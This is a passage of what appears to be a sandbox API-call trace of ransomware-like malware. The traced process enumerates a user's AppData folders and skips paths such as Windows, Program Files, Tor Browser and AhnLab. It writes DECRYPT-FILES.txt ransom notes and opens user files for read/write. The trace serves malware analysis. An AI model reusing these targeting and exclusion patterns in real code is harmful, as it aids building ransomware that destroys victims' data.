HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch=":\\Windows") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Games\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\All Users") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="AhnLab") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.067] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0078.067] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.067] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\jkbimi8.tmp") returned 103 [0078.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0078.068] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0078.068] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.068] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\DECRYPT-FILES.txt") returned 109 [0078.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0078.069] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0078.070] CloseHandle (hObject=0x464) returned 1 [0078.070] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0078.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0078.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0078.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.070] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.070] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.070] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.070] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.070] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.070] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.071] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.071] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.071] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.071] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.071] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0078.071] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.071] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0078.071] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\jkbimi8.tmp" [0078.071] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.071] CloseHandle (hObject=0x0) returned 0 [0078.071] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.071] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0078.071] lstrcmpiW (lpString1="rasphone.pbk", lpString2="DECRYPT-FILES.txt") returned 1 [0078.071] lstrcmpiW (lpString1="rasphone.pbk", lpString2="autorun.inf") returned 1 [0078.071] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot.ini") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="desktop.ini") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="iconcache.db") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootsect.bak") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat.log") returned 1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="thumbs.db") returned -1 [0078.072] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Bootfont.bin") returned 1 [0078.072] lstrlenW (lpString="rasphone.pbk") returned 12 [0078.072] lstrcmpiW (lpString1="pbk", lpString2="lnk") returned 1 [0078.072] lstrcmpiW (lpString1="pbk", lpString2="exe") returned 1 [0078.072] lstrcmpiW (lpString1="pbk", lpString2="sys") returned -1 [0078.072] lstrcmpiW (lpString1="pbk", lpString2="dll") returned 1 [0078.072] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0078.072] lstrlenW (lpString="rasphone.pbk") returned 12 [0078.072] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0078.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="rasphone.pbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" [0078.072] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0078.072] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=0) returned 1 [0078.072] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0078.073] CloseHandle (hObject=0x0) returned 0 [0078.073] CloseHandle (hObject=0x468) returned 1 [0078.073] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.073] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0078.073] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0078.073] CloseHandle (hObject=0x460) returned 1 [0078.073] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk\\", cAlternateFileName="_HIDDE~1")) returned 0 [0078.073] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0078.073] CloseHandle (hObject=0x458) returned 1 [0078.073] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk\\", cAlternateFileName="")) returned 0 [0078.073] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.074] CloseHandle (hObject=0x450) returned 1 [0078.074] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.074] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.074] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.074] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.074] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.074] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.074] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.074] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.074] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.074] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0078.074] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.074] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" [0078.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\jkbimi8.tmp" [0078.074] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.075] CloseHandle (hObject=0x0) returned 0 [0078.075] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.075] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.075] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.075] CloseHandle (hObject=0x448) returned 1 [0078.075] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dae0390, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dae0390, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0078.075] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0078.075] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0078.075] lstrcatW (in: lpString1="Office", lpString2="\\" | out: lpString1="Office\\") returned="Office\\" [0078.076] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Program Files") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch=":\\Windows") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Games\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\All Users") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="AhnLab") returned 0x0 [0078.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0078.076] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.076] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\jkbimi8.tmp") returned 75 [0078.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0078.078] lstrlenW (lpString="DECRYPT-FILES.txt") returned 